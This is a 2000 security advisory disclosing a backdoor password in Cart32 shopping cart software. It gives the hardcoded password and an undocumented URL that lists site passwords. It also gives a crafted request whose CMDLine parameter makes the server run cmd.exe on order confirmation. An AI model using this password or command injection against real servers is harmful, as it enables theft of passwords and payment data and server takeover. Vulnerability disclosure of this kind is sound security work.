Backdoor in Cart32 Software

Reported April 27, 2000 by
Cerberus Information Security
VERSIONS AFFECTED
  • Cart32 v2.6 and 3.0 -- Web-based shopping cart software

DESCRIPTION

The Cerberus Security Team has discovered a backdoor in McMurtrey/Whitaker & Associates, Inc.'s Cart32 software. The backdoor can be used to gain access to sensitive information such as passwords and credit card information. In addition, arbitrary commands may be run on the remote server, and the administrative password may be changed without knowledge of the current administrative password.

Within cart32.exe there is a secret backdoor password of "wemilo" that can be found at file offset 0x6204h. The password is known internally to the software as the Cart32Password.


DEMONSTRATION

With knowledge of this password an attacker can go to one of several undocumented URLs, such as http://abc123/scripts/cart32.exe/cart32clientlist, and obtain a list of the passwords for each Cart32 shopping site on the server. A specially crafted URL could allow an attacker to configure the server so that it runs commands when an order is confirmed. For example, the following URL would set the cart's properties to spawn a shell, perform a directory listing and pipe the output to a file called file.txt on the root of the C: drive when an order is confirmed.


http://abc123/scripts/c32web.exe?TabName=Cart32%2B
&Action=Save+Cart32%2B+Tab&SaveTab=Cart32%2B&Client=[client]
&ClientPassword=[password]&Admin=&AdminPassword=&TabToSave=Cart32%2B
&PlusTabToSave=Run+External+Program&UseCMDLine=Yes
&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile.txt


VENDOR RESPONSE

The vendor issued a patch to remove the backdoors.
http://www.cart32.com/update

CREDITS
Discovered and reported by
Cerberus Information Security